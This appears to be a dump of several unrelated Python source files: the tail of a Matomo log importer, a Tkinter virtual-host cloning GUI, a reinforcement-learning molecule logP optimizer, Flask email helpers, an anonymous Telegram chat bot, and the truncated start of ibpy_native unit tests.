hit.date = datetime.datetime.strptime(date_string, format.date_format)
hit.date += datetime.timedelta(seconds = config.options.seconds_to_add_to_date)
except ValueError as e:
invalid_line(line, 'invalid date or invalid format: %s' % str(e))
continue
# Parse timezone and subtract its value from the date
try:
timezone = float(format.get('timezone'))
except BaseFormatException:
timezone = 0
except ValueError:
invalid_line(line, 'invalid timezone')
continue
if timezone:
hit.date -= datetime.timedelta(hours=timezone/100)
if config.options.replay_tracking:
# we need a query string and we only consider requests with piwik.php
if not hit.query_string or not hit.path.lower().endswith(config.options.replay_tracking_expected_tracker_file):
invalid_line(line, 'no query string, or ' + hit.path.lower() + ' does not end with piwik.php')
continue
query_arguments = urlparse.parse_qs(hit.query_string)
if not "idsite" in query_arguments:
invalid_line(line, 'missing idsite')
continue
try:
hit.args.update((k, v.pop().encode('raw_unicode_escape').decode(config.options.encoding)) for k, v in query_arguments.iteritems())
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
(is_filtered, reason) = self.is_filtered(hit)
if is_filtered:
filtered_line(line, reason)
continue
hits.append(hit)
if len(hits) >= config.options.recorder_max_payload_size * len(Recorder.recorders):
Recorder.add_hits(hits)
hits = []
# add last chunk of hits
if len(hits) > 0:
Recorder.add_hits(hits)
def _add_custom_vars_from_regex_groups(self, hit, format, groups, is_page_var):
for group_name, custom_var_name in groups.iteritems():
if group_name in format.get_all():
value = format.get(group_name)
# don't track the '-' empty placeholder value
if value == '-':
continue
if is_page_var:
hit.add_page_custom_var(custom_var_name, value)
else:
hit.add_visit_custom_var(custom_var_name, value)
def main():
"""
Start the importing process.
"""
stats.set_time_start()
if config.options.show_progress:
stats.start_monitor()
recorders = Recorder.launch(config.options.recorders)
try:
for filename in config.filenames:
parser.parse(filename)
Recorder.wait_empty()
except KeyboardInterrupt:
pass
stats.set_time_stop()
if config.options.show_progress:
stats.stop_monitor()
stats.print_summary()
def fatal_error(error, filename=None, lineno=None):
print >> sys.stderr, 'Fatal error: %s' % error
if filename and lineno is not None:
print >> sys.stderr, (
'You can restart the import of "%s" from the point it failed by '
'specifying --skip=%d on the command line.\n' % (filename, lineno)
)
os._exit(1)
if __name__ == '__main__':
try:
config = Configuration()
# The matomo object depends on the config object, so we have to create
# it after creating the configuration.
matomo = Matomo()
# The init_token_auth method may need the matomo option, so we must call
# it after creating the matomo object.
config.init_token_auth()
stats = Statistics()
resolver = config.get_resolver()
parser = Parser()
main()
sys.exit(0)
except KeyboardInterrupt:
pass
|
vh-gui.py
|
#!/usr/bin/python
import Tkinter
from Tkinter import *
import urllib
import json
import ConfigParser
import os
import subprocess
from threading import Thread
from Queue import Queue, Empty
def iter_except(function, exception):
try:
while True:
yield function()
except exception:
return
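# A minimal sketch of how iter_except is used below: it drains a Queue without
# blocking, stopping cleanly when Queue.Empty is raised.
#   q = Queue(); q.put("a"); q.put("b")
#   list(iter_except(q.get_nowait, Empty))  # -> ["a", "b"]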
class VirtualHostsGui:
devs = None
window = None
list = None
devName = None
devAlias = None
devUrl = None
repo = None
options = {}
homeDir = None
database = None
url = None
pathEntry = None
vh = None
text = None
cloneWindow = None
config_path = "/usr/local/etc/virtualhosts/config.ini"
current = None
def __init__(self):
self.homeDir = os.path.expanduser("~")
self.read_config()
if not self.options["devs_json_url"]:
print("Error: 'devs_json_url' not set in " + self.config_path)
exit(1)
self.devs = json.loads(urllib.urlopen(self.options["devs_json_url"]).read())["devs"]
self.devs.sort(key=self.handle_sort)
self.window = Tkinter.Tk()
self.window.title("VirtualHosts")
self.window.geometry("700x495")
self.window.resizable(0, 0)
ws = self.window.winfo_screenwidth()
hs = self.window.winfo_screenheight()
x = (ws / 2) - (700 / 2)
y = (hs / 2) - (495 / 2)
self.window.geometry('+%d+%d' % (x, y))
self.list = Listbox(self.window, width=20, height=29, font='Helvetica 14')
self.list.bind("<<ListboxSelect>>", self.on_select)
self.devName = StringVar()
self.devAlias = StringVar()
self.devUrl = StringVar()
self.database = StringVar()
self.url = StringVar()
self.repo = StringVar()
dev_name_label = Label(self.window, textvariable=self.devName, font='Helvetica 18 bold')
dev_alias_label = Label(self.window, textvariable=self.devAlias, font='Helvetica 16')
dev_url_label = Label(self.window, textvariable=self.devUrl, font='Helvetica 16')
config_path_label = Label(self.window, text=self.options["webroot_path"], font='Helvetica 14')
database_label = Label(self.window, textvariable=self.database, font='Helvetica 16')
url_label = Label(self.window, textvariable=self.url, font='Helvetica 16')
repo_label = Label(self.window, textvariable=self.repo, font='Helvetica 16')
self.pathEntry = Entry(self.window)
clone_button = Button(self.window, text="Clone", command=self.clone)
i = 0
for dev in self.devs:
self.list.insert(i, dev["name"])
i += 1
self.list.grid(row=0, column=0, rowspan=60)
dev_name_label.grid(row=0, column=1, sticky="W", columnspan=2)
dev_alias_label.grid(row=1, column=1, sticky="W", columnspan=2)
dev_url_label.grid(row=2, column=1, sticky="W", columnspan=2)
database_label.grid(row=3, column=1, sticky="W", columnspan=2)
url_label.grid(row=4, column=1, sticky="W", columnspan=2)
repo_label.grid(row=5, column=1, sticky="W", columnspan=2)
config_path_label.grid(row=59, column=1, sticky="E")
clone_button.grid(row=59, column=3, sticky="E")
self.pathEntry.grid(row=59, column=2, sticky="W")
self.window.mainloop()
def clone(self):
if not self.current:
return
self.cloneWindow = Tkinter.Tk()
self.cloneWindow.title("Cloning...")
self.cloneWindow.resizable(0, 0)
self.cloneWindow.geometry("500x300")
ws = self.cloneWindow.winfo_screenwidth()
hs = self.cloneWindow.winfo_screenheight()
x = (ws / 2) - (500 / 2)
y = (hs / 2) - (300 / 2)
self.cloneWindow.geometry('+%d+%d' % (x, y))
self.cloneWindow.protocol("WM_DELETE_WINDOW", self.quit)
self.text = Text(self.cloneWindow)
self.text.pack()
index = self.current
domain = self.devs[index]["alias"].replace("_", "-")
path = self.pathEntry.get().replace(" ", "_")
database = self.devs[index]["alias"]
repo = self.devs[index]["repo"]
alias = self.devs[index]["alias"]
dev_url = self.devs[index]["url"]
command = "vh create " + alias + " -d " + domain + " -p " + path + " -db " + database + " -cr " + repo + " -b -cd " + dev_url + " -i -sr"
self.vh = subprocess.Popen(command.split(), stdout=subprocess.PIPE, bufsize=1)
self.text.insert(INSERT, "Running '" + command + "'...\n")
q = Queue()
t = Thread(target=self.reader_thread, args=[q])
t.daemon = True
t.start()
self.update(q)
self.cloneWindow.mainloop()
def quit(self):
self.vh.kill()
os.system("osascript -e 'do shell script \"" + self.options["apache_reload_command"] + "\" with administrator privileges'")
self.cloneWindow.destroy()
def update(self, q):
for line in iter_except(q.get_nowait, Empty):
if line is None:
self.quit()
return
else:
self.text.insert(INSERT, line)
break
self.cloneWindow.after(40, self.update, q)
def reader_thread(self, q):
try:
for line in iter(self.vh.stdout.readline, b''):
q.put(line)
self.vh.stdout.close()
finally:
q.put(None)
def on_select(self, e):
w = e.widget
index = int(w.curselection()[0])
self.devName.set("Name: " + self.devs[index]["name"])
self.devAlias.set("Alias: " + self.devs[index]["alias"])
self.devUrl.set("Dev URL: http://" + self.devs[index]["url"])
self.database.set("Database: " + self.devs[index]["alias"])
self.repo.set("Repo: " + self.devs[index]["repo"])
self.url.set("Local URL: http://" + self.devs[index]["alias"].replace("_", "-") + ".lo")
self.pathEntry.delete(0, len(self.pathEntry.get()))
self.pathEntry.insert(0, self.devs[index]["alias"])
self.current = index
def handle_sort(self, elem):
return elem["name"]
def read_config(self):
config = ConfigParser.RawConfigParser()
config.read(self.config_path)
self.options["webroot_path"] = config.get("General", "webroot_path")
self.options["apache_reload_command"] = config.get("General", "apache_reload_command")
self.options["devs_json_url"] = config.get("General", "devs_json_url")
self.options["webroot_path"] = self.options["webroot_path"].replace("%HOME_DIR%", self.homeDir)
VirtualHostsGui()
|
optimize_logp.py
|
""" Optimize the logP of a molecule
Starting point: methane (C)
- actions: add a bond or an atom
- state: molecule state
- reward: 0, unless a terminal state is reached, then the penalized logp estimate of the molecule
"""
import argparse
import logging
import math
import multiprocessing
import os
import sys
import time
import networkx as nx
import rdkit
from rdkit import Chem, RDConfig
from rdkit.Chem import Descriptors
# from rdkit.Contrib import SA_Score
sys.path.append(os.path.join(RDConfig.RDContribDir, 'SA_Score'))
# noinspection PyUnresolvedReferences
import sascorer
from rlmolecule.sql.run_config import RunConfig
from examples.qed.optimize_qed import construct_problem
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
# copied from here: https://github.com/google-research/google-research/blob/master/mol_dqn/experimental/optimize_logp.py
# Zhou et al., Optimization of Molecules via Deep Reinforcement Learning. Scientific Reports 2019
def num_long_cycles(mol):
"""Calculate the number of long cycles.
Args:
mol: Molecule. A molecule.
Returns:
negative cycle length.
"""
cycle_list = nx.cycle_basis(nx.Graph(Chem.rdmolops.GetAdjacencyMatrix(mol)))
if len(cycle_list) == 0:
cycle_length = 0
else:
cycle_length = max([len(j) for j in cycle_list])
if cycle_length <= 6:
cycle_length = 0
else:
cycle_length = cycle_length - 6
return -cycle_length
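# A quick illustration (assumes RDKit is available): benzene's largest ring has 6
# atoms, so it incurs no long-cycle penalty, while a 10-membered ring is penalized
# by -(10 - 6) = -4.
#   num_long_cycles(Chem.MolFromSmiles('c1ccccc1'))      # -> 0
#   num_long_cycles(Chem.MolFromSmiles('C1CCCCCCCCC1'))  # -> -4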
def penalized_logp(molecule):
log_p = Descriptors.MolLogP(molecule)
sas_score = sascorer.calculateScore(molecule)
cycle_score = num_long_cycles(molecule)
return log_p - sas_score + cycle_score
# copied from here: https://github.com/dbkgroup/prop_gen/blob/d17d935a534b6a667d2603b4d0c7b4add446d6bf/gym-molecule/gym_molecule/envs/molecule.py
# Khemchandani et al., DeepGraphMolGen [...]. J. Cheminform 2020
def reward_penalized_log_p(mol):
"""
Reward that consists of log p penalized by SA and # long cycles,
as described in (Kusner et al. 2017). Scores are normalized based on the
statistics of 250k_rndm_zinc_drugs_clean.smi dataset
:param mol: rdkit mol object
:return: float
"""
# normalization constants, statistics from 250k_rndm_zinc_drugs_clean.smi
logP_mean = 2.4570953396190123
logP_std = 1.434324401111988
SA_mean = -3.0525811293166134
SA_std = 0.8335207024513095
cycle_mean = -0.0485696876403053
cycle_std = 0.2860212110245455
log_p = Descriptors.MolLogP(mol)
SA = -sascorer.calculateScore(mol)
cycle_score = num_long_cycles(mol)
normalized_log_p = (log_p - logP_mean) / logP_std
normalized_SA = (SA - SA_mean) / SA_std
normalized_cycle = (cycle_score - cycle_mean) / cycle_std
return normalized_log_p + normalized_SA + normalized_cycle
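# Usage sketch (exact values depend on the installed RDKit / sascorer versions,
# so none are asserted here): the result is the sum of the three normalized terms.
#   mol = Chem.MolFromSmiles('CCO')
#   print(reward_penalized_log_p(mol))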
def construct_problem(run_config):
# We have to delay all importing of tensorflow until the child processes launch,
# see https://github.com/tensorflow/tensorflow/issues/8220. We should be more careful about where / when we
# import tensorflow, especially if there's a chance we'll use tf.serving to do the policy / reward evaluations on
# the workers. Might require upstream changes to nfp as well.
from rlmolecule.tree_search.reward import RankedRewardFactory
from rlmolecule.tree_search.reward import LinearBoundedRewardFactory
from rlmolecule.molecule.molecule_problem import MoleculeTFAlphaZeroProblem
from rlmolecule.molecule.molecule_state import MoleculeState
from rlmolecule.molecule.builder.builder import MoleculeBuilder
class PenLogPOptimizationProblem(MoleculeTFAlphaZeroProblem):
def get_initial_state(self) -> MoleculeState:
return MoleculeState(rdkit.Chem.MolFromSmiles('C'), self._config)
def get_reward(self, state: MoleculeState) -> (float, {}):
if state.forced_terminal:
return reward_penalized_log_p(state.molecule), {'forced_terminal': True, 'smiles': state.smiles}
return 0.0, {'forced_terminal': False, 'smiles': state.smiles}
prob_config = run_config.problem_config
builder = MoleculeBuilder(
max_atoms=prob_config.get('max_atoms', 25),
min_atoms=prob_config.get('min_atoms', 1),
try_embedding=prob_config.get('tryEmbedding', True),
sa_score_threshold=prob_config.get('sa_score_threshold', 4),
stereoisomers=prob_config.get('stereoisomers', False),
atom_additions=prob_config.get('atom_additions', ('C', 'N', 'O'))
)
engine = run_config.start_engine()
run_id = run_config.run_id
train_config = run_config.train_config
if train_config.get('linear_reward'):
reward_factory = LinearBoundedRewardFactory(min_reward=train_config.get('min_reward', 0),
max_reward=train_config.get('max_reward', 20))
else:
reward_factory = RankedRewardFactory(
engine=engine,
run_id=run_id,
reward_buffer_min_size=train_config.get('reward_buffer_min_size', 10),
reward_buffer_max_size=train_config.get('reward_buffer_max_size', 50),
ranked_reward_alpha=train_config.get('ranked_reward_alpha', 0.75)
)
problem = PenLogPOptimizationProblem(
engine,
builder,
run_id=run_id,
reward_class=reward_factory,
num_messages=train_config.get('num_messages', 1),
num_heads=train_config.get('num_heads', 2),
features=train_config.get('features', 8),
max_buffer_size=train_config.get('max_buffer_size', 200),
min_buffer_size=train_config.get('min_buffer_size', 15),
batch_size=train_config.get('batch_size', 32),
policy_checkpoint_dir=train_config.get(
'policy_checkpoint_dir', 'policy_checkpoints')
)
return problem
def run_games(run_config):
from rlmolecule.alphazero.alphazero import AlphaZero
config = run_config.mcts_config
game = AlphaZero(
construct_problem(run_config),
min_reward=config.get('min_reward', 0.0),
pb_c_base=config.get('pb_c_base', 1.0),
pb_c_init=config.get('pb_c_init', 1.25),
dirichlet_noise=config.get('dirichlet_noise', True),
dirichlet_alpha=config.get('dirichlet_alpha', 1.0),
dirichlet_x=config.get('dirichlet_x', 0.25),
# MCTS parameters
ucb_constant=config.get('ucb_constant', math.sqrt(2)),
)
while True:
path, reward = game.run(
num_mcts_samples=config.get('num_mcts_samples', 50),
max_depth=config.get('max_depth', 1000000),
)
logger.info(f'Game Finished -- Reward {reward.raw_reward:.3f} -- Final state {path[-1][0]}')
def train_model(run_config):
config = run_config.train_config
construct_problem(run_config).train_policy_model(
steps_per_epoch=config.get('steps_per_epoch', 100),
lr=float(config.get('lr', 1E-3)),
epochs=int(float(config.get('epochs', 1E4))),
game_count_delay=config.get('game_count_delay', 20),
verbose=config.get('verbose', 2)
)
def monitor(run_config):
from rlmolecule.sql.tables import RewardStore
problem = construct_problem(run_config)
while True:
best_reward = problem.session.query(RewardStore) \
.filter_by(run_id=problem.run_id) \
.order_by(RewardStore.reward.desc()).first()
num_games = len(list(problem.iter_recent_games()))
if best_reward:
print(f"Best Reward: {best_reward.reward:.3f} for molecule "
f"{best_reward.data['smiles']} with {num_games} games played")
time.sleep(5)
def setup_argparser():
parser = argparse.ArgumentParser(
description='Run the Penalized LogP optimization. Default is to run the script locally')
parser.add_argument('--config', type=str,
help='Configuration file')
parser.add_argument('--train-policy', action="store_true", default=False,
help='Train the policy model only (on GPUs)')
parser.add_argument('--rollout', action="store_true", default=False,
help='Run the game simulations only (on CPUs)')
return parser
if __name__ == "__main__":
parser = setup_argparser()
args = parser.parse_args()
run_config = RunConfig(args.config)
if args.train_policy:
train_model(run_config)
elif args.rollout:
# make sure the rollouts do not use the GPU
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
run_games(run_config)
else:
jobs = [multiprocessing.Process(target=monitor, args=(run_config,))]
jobs[0].start()
time.sleep(1)
for i in range(5):
jobs += [multiprocessing.Process(target=run_games, args=(run_config,))]
jobs += [multiprocessing.Process(target=train_model, args=(run_config,))]
for job in jobs[1:]:
job.start()
for job in jobs:
job.join(300)
|
emails.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author:Administrator
@file: emails.py
@time: 2019/06/05
@software: PyCharm
@detail: Email helpers
"""
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from albumy.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
message = Message(current_app.config['ALBUMY_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
app = current_app._get_current_object()
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
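# Design note: current_app is a context-local proxy, so the real application object is
# captured with _get_current_object() and pushed as an app context inside the worker
# thread; mail.send() needs that context to read the app's mail configuration.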
def send_confirm_email(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
|
makebot.py
|
#!/usr/bin/env python3
# -*- coding: utf8 -*-
# Made by Make http://github.com/mak3e
#
# Imports
from telegram.ext import Updater, CommandHandler, MessageHandler # python-telegram-bot
from threading import Thread
from datetime import datetime
import threading
import sqlite3
import animals
import subprocess
import time
# Variables
ids = []
token = "" # Bot token here
token = open("TOKEN").read().split("\n")[0]
print(token)
if not token:
raise ValueError('please add token')
todo = [] # Used for storing send jobs
conn = sqlite3.connect('data.db', check_same_thread=False, isolation_level=None) # Init sqlite db
c = conn.cursor() # Database cursor
lock = threading.Lock() # Lock used for threading
custom_names = {1: "admin"} # Used for special names
# Strings
bot_name = "BOT" # Bot name shown in bot messages
with open("BUILD", "r") as f:
build = f.read() # Get build number from BUILD file
version = "0.3_" + str(build) # Version is version+build
author = "Make" # Author
help_text = "Underground chat of the @TheVillageChats chat network.\n\nHere you can chat anonymously with others.\n\n/help - Help\n/license - Shows the license\n/info - Information about your identity and the server\n/renew - Renews your identity\n/stop - Stops the bot"
license_text = "The Bot is hosted by @GeloMyrtol. It's free software (like in freedom not in free beer) and is available under MIT license at https://github.com/Bergiu/makebot."
welcome_text = "Welcome to the chatbot! Say hello to everyone! Made by {{author}}!" # Shown for new users
stats_text = "Chat info\nYour name: {{name}}\nCurrent room: {{room}}\nTotal users: {{users}}\nVersion {{version}}" # Statistic text
name_text = "Your new ID is {{name}}" # Shown for users renewing their identity
room_text = "Rooms\nYou can join rooms using /join room\n{{rooms}}" # Not implemented
commit_msg = subprocess.check_output(['git', 'log', '-1', '--pretty=%B']).decode("utf-8")
update_text = "Chatbot updated to version {{version}}\nUpdate notes:\n+" + commit_msg # Text shown when bot is run
unknown_text = "Unknown command!" # Text shown when unknown command is typed
exit_text = "Bye bye {{name}}! You can always come back by using /start" # Text shown when /stop is used
# main
def main():
updater = Updater(token) # Updater, check python-telegram-bot docs
dispatcher = updater.dispatcher # Dispatcher, check ptb docs
dispatcher.add_handler(CommandHandler('help', help)) # help command
dispatcher.add_handler(CommandHandler('license', license)) # license command
dispatcher.add_handler(CommandHandler('start', start)) # define start command
dispatcher.add_handler(CommandHandler('renew', renew)) # same for renew
dispatcher.add_handler(CommandHandler('info', info)) # same for info
dispatcher.add_handler(CommandHandler('rooms', rooms)) # experimental and not implemented
dispatcher.add_handler(MessageHandler([], message)) # message handler
dispatcher.add_handler(CommandHandler('stop', stop)) # define stop command
# dispatcher.addUnknownTelegramCommandHandler(unknown) # used for unknown commands
Thread(target=process).start() # initialize process thread
queue(Thread(target=send, args=(updater.bot, bot_name, send_text, 1, 0, update_text,))) # add send update_text job to queue
updater.start_polling() # start polling for messages
updater.idle() # idle
# todo worker
def process():
while 1: # forever
time.sleep(1)
if len(todo) > 0: # if there is jobs in todo list
try:
todo[0].start() # try to start a job
todo.pop(0) # and remove it from queue
except Exception:
pass # if job cannot be started this time (this will happen) try again
# queue
def queue(action):
    todo.append(action) # add Thread object (job) to todo list
def sql(query, ret=0): # sql query parsing helper
try:
lock.acquire(True) # use lock (otherwise threading and sqlite dont work together)
c.execute(query) # exec query
if ret: # if return flag is set
return c.fetchall() # return stuff
finally:
lock.release() # release the lock
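# A parameterized variant of the helper above (a sketch only, not used elsewhere in
# this file) would let sqlite3 handle value quoting instead of string concatenation:
#   def sql_params(query, params=(), ret=0):
#       with lock:
#           c.execute(query, params)
#           if ret:
#               return c.fetchall()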
# use this for logging
def log(message): # log a message to log file
log_text = str(datetime.now()) + ": " + message + "\n"
with open("log", "a") as f:
f.write(log_text)
# /help
def help(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, help_text,))) # send help text
# /license
def license(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, license_text,))) # send license text
# /start
def start(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, welcome_text,))) # send welcome text
if update.message.chat_id not in ids: # if user is not in database add it using renew function
renew(bot, update)
# /renew - Get new public ID
def renew(bot, update):
user_type = 0 # not implemented
room = 0 # not implemented
data = sql("SELECT user_type, room FROM 'users' WHERE telegram_id=" + str(update.message.chat_id), 1) # not implemented
remove(update.message.chat_id) # remove old database entry if exists (renew user id)
if len(data) > 0:
if len(data[0]) > 0:
user_type = data[0][0] # not implemented
room = data[0][1] # not implemented
sql("INSERT INTO 'users' ('telegram_id', 'user_type', 'room') VALUES(" + str(update.message.chat_id) + ", " + str(user_type) + ", " + str(room) + ")") # add user to database
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, name_text,))) # send name_text to user
# /stats - Show some statistics
def info(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, stats_text,))) # send stats_text to user
# /rooms - Show rooms
def rooms(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, room_text,))) # not implemented (but works)
# /stop - Stop receiving messages
def stop(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, exit_text,))) # send exit_text to user
remove(update.message.chat_id)
# any message - Send messages to other users
def message(bot, update):
if get_name(update.message.chat_id) == 0: # if sender not in database, add it
renew(bot, update)
if update.message.photo: # if message contains something send it as something to all other users (add job to queue)
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_photo, 1, update.message.chat_id, update.message.caption, get_room(update.message.chat_id), update.message.photo[0].file_id,)))
elif update.message.sticker:
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_sticker, 1, update.message.chat_id, "", get_room(update.message.chat_id), update.message.sticker.file_id,)))
elif update.message.video:
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_video, 1, update.message.chat_id, update.message.caption, get_room(update.message.chat_id), update.message.video.file_id,)))
elif update.message.audio:
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_audio, 1, update.message.chat_id, "", get_room(update.message.chat_id), update.message.audio.file_id,)))
elif update.message.document:
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_document, 1, update.message.chat_id, update.message.document.file_name, get_room(update.message.chat_id), update.message.document.file_id,)))
else:
queue(Thread(target=send, args=(bot, str(get_name(update.message.chat_id)), send_text, 1, update.message.chat_id, update.message.text, get_room(update.message.chat_id),)))
# optimized sending
def send(bot, name, send_type, mode=0, source_id=0, text="", room=0, file=0):
print("sent")
# modes 0=to everyone, 1=to everyone but source_id, 2= to source_id (must exist)
text = manipulate(text, get_name(source_id), room) # apply filters to the message
message_type = "message" # was implemented for logging purposes, all messages are now just "message"
log(name + ": (" + message_type + ")\n" + text) # log message
if mode != 2: # if mode is not 2 send message to everyone or to everyone else than sender
for target_id in sql("SELECT telegram_id FROM 'users' WHERE room=" + str(room), 1):
print(target_id)
if target_id[0] != source_id or mode == 0: # send to all but the sender
queue(Thread(target=send_type, args=(bot, target_id[0], name, file, text,))) # add send message to queue
else:
send_text(bot, source_id, name, file, text)
# functions used for sending messages
# send text message
def send_text(bot, target_id, name, ignore, message):
try:
bot.sendMessage(chat_id=target_id, text=(bold(name) + ":\n" + message), parse_mode="HTML")
except Exception as e:
send_error(target_id, name, e, "t")
pass
# send photo
def send_photo(bot, target_id, name, photo, caption):
try:
bot.sendPhoto(chat_id=target_id, photo=str(photo), caption=caption + " " + name)
except Exception as e:
send_error(target_id, name, e, "p")
pass
# send sticker
def send_sticker(bot, target_id, name, sticker, ignore):
try:
bot.sendSticker(chat_id=target_id, sticker=str(sticker))
except Exception as e:
send_error(target_id, name, e, "s")
pass
# send video
def send_video(bot, target_id, name, video, caption):
try:
bot.sendVideo(chat_id=target_id, video=str(video), caption=caption)
except Exception as e:
send_error(target_id, name, e, "v")
pass
# send audio
def send_audio(bot, target_id, name, audio, ignore):
try:
bot.sendAudio(chat_id=target_id, audio=str(audio), performer=name)
except Exception as e:
send_error(target_id, name, e, "a")
pass
# send document
def send_document(bot, target_id, name, document, filename):
try:
bot.sendDocument(chat_id=target_id, document=document, filename=filename)
except Exception as e:
send_error(target_id, name, e, "d")
pass
# handle errors in sending, remove target if error type is Unauthorized
def send_error(target_id, name, e, t):
log("Error: " + name + " -[" + t + "]-> " + str(get_name(target_id)) + ": " + str(e))
if "Unauthorized" in str(e):
remove(target_id)
# bold function
def bold(string):
return "<b>" + string + "</b>"
# manipulate
def manipulate(text, name="", room_id=0):
# replace tags with names and fix possible html characters in message
count = sql("SELECT Count(*) FROM 'users'", 1)[0][0]
room = sql("SELECT name FROM 'rooms' WHERE id=" + str(room_id), 1)[0][0]
    placeholders = {"&": "&amp;", "{{author}}": author, "{{name}}": name, "{{room}}": room, "{{users}}": count, "{{version}}": version, "<": "&lt;", ">": "&gt;"}
for placeholder in placeholders:
s1 = str(placeholder)
s2 = str(placeholders[placeholder])
text = text.replace(s1, s2)
return text
# Unknown command
def unknown(bot, update):
queue(Thread(target=send, args=(bot, bot_name, send_text, 2, update.message.chat_id, unknown_text,)))
# get name using animals script
def get_name(telegram_id):
user_id = get_id(telegram_id)
if user_id in custom_names:
return custom_names[user_id].capitalize()
return animals.get_name(user_id) + " #" + str(user_id)
# get id from database
def get_id(telegram_id):
try:
ids = sql("SELECT id FROM 'users' WHERE telegram_id=" + str(telegram_id), 1)
if len(ids) > 0:
return int(ids[0][0])
else:
return 0
except Exception:
return -1
# get room (rooms are not implemented)
def get_room(telegram_id):
return sql("SELECT room FROM 'users' WHERE telegram_id=" + str(telegram_id), 1)[0][0]
# remove user from db
def remove(telegram_id):
sql("DELETE FROM 'users' WHERE telegram_id=" + str(telegram_id))
if __name__ == "__main__":
main()
|
test_wrapper.py
|
"""Unit tests for module `ibpy_native._internal._wrapper`."""
# pylint: disable=protected-access
import asyncio
import datetime
import threading
import unittest
from ibapi import contract
from ibapi import wrapper
from ibpy_native import error
from ibpy_native import models
from ibpy_native import manager
from ibpy_native._internal import _client
from ibpy_native._internal import _global
from ibpy_native._internal import _wrapper
from ibpy_native.utils import datatype
from ibpy_native.utils import finishable_queue as fq
from tests.toolkit import sample_contracts
from tests.toolkit import sample_orders
from tests.toolkit import utils
class TestGeneral(unittest.TestCase):
"""Unit tests for general/uncategorised things in `IBWrapper`.
* Connection with IB is NOT required.
"""
def setUp(self):
self._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
def test_set_on_notify_listener(self):
"""Test setter `set_on_notify_listener` & overridden function `error`
for the delivery of IB system notification.
* Expect to receive IB's system notification (`reqId` -1) once the
notification listener is set.
"""
code = 1001
msg = "MOCK MSG"
listener = utils.MockNotificationListener()
self._wrapper.set_on_notify_listener(listener)
# Mock IB system notification
self._wrapper.error(reqId=-1, errorCode=code, errorString=msg)
# Notification should have received by the notification listener
self.assertEqual(listener.msg_code, code)
self.assertEqual(listener.msg, msg)
@utils.async_test
async def test_error(self):
"""Test overridden function `error`."""
req_id = 1
code = 404
msg = "ERROR"
# Prepare request queue
queue = self._wrapper.get_request_queue(req_id)
# Mock IB error
self._wrapper.error(reqId=req_id, errorCode=code, errorString=msg)
queue.put(element=fq.Status.FINISHED)
result = await queue.get()
# Expect exception of `IBError` to be sent to corresponding request
# queue.
self.assertIsInstance(result[0], error.IBError)
self.assertEqual(result[0].err_code, code)
self.assertEqual(result[0].err_str, msg)
class TestConnectionEvents(unittest.TestCase):
"""Unit tests for connection events related mechanism implemented in
`IBWrapper`.
* Connection with IB is NOT REQUIRED.
"""
def setUp(self):
self._listener = utils.MockConnectionListener()
self._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager(),
connection_listener=self._listener
)
def test_on_connected(self):
"""Test the event of connection established."""
# Mock the behaviour of initial handshake callback once the connection
# is made.
self._wrapper.nextValidId(orderId=1)
self.assertTrue(self._listener.connected)
def test_on_disconnected(self):
"""Test the event of connection dropped."""
# Mock the `NOT_CONNECTED` error is returned to `error` callback
self._wrapper.error(reqId=-1, errorCode=error.IBErrorCode.NOT_CONNECTED,
errorString=_global.MSG_NOT_CONNECTED)
self.assertFalse(self._listener.connected)
class TestReqQueue(unittest.TestCase):
"""Unit tests for `_req_queue` related mechanicisms in `IBWrapper`.
Connection with IB is NOT required.
"""
def setUp(self):
self._wrapper = _wrapper.IBWrapper(
client_id=utils.IB_CLIENT_ID,
accounts_manager=utils.MockAccountsManagementDelegate(),
orders_manager=manager.OrdersManager()
)
self._init_id = utils.IB_CLIENT_ID * 1000
def test_next_req_id_0(self):
"""Test property `next_req_id` for retrieval of next usable
request ID.
* No ID has been occupied yet.
"""
# 1st available request ID should always be initial request ID
self.assertEqual(self._wrapper.next_req_id, self._init_id)
def test_next_req_id_1(self):
"""Test property `next_req_id` for retrieval of next usable
request ID.
* Initial request ID has already been occupied.
"""
# Occupy request ID `CLIENT_ID * 1000`
self._wrapper.get_request_queue(req_id=self._init_id)
# Next available request ID should be `CLIENT_ID * 1000 + 1`
self.assertEqual(self._wrapper.next_req_id, self._init_id + 1)
@utils.async_test
async def test_next_req_id_2(self):
"""Test property `next_req_id` for retrieval of next usable
request ID.
* Initial request ID was occupied but released for reuse.
"""
# Occupy initial request ID
queue = self._wrapper.get_request_queue(req_id=self._init_id)
# Release initial request ID by marking the queue associated as FINISHED
queue.put(element=fq.Status.FINISHED)
await queue.get()
# Next available request ID should reuse initial request ID
self.assertEqual(self._wrapper.next_req_id, self._init_id)
def test_get_request_queue_0(self):
"""Test getter `get_request_queue`."""
try:
self._wrapper.get_request_queue(req_id=1)
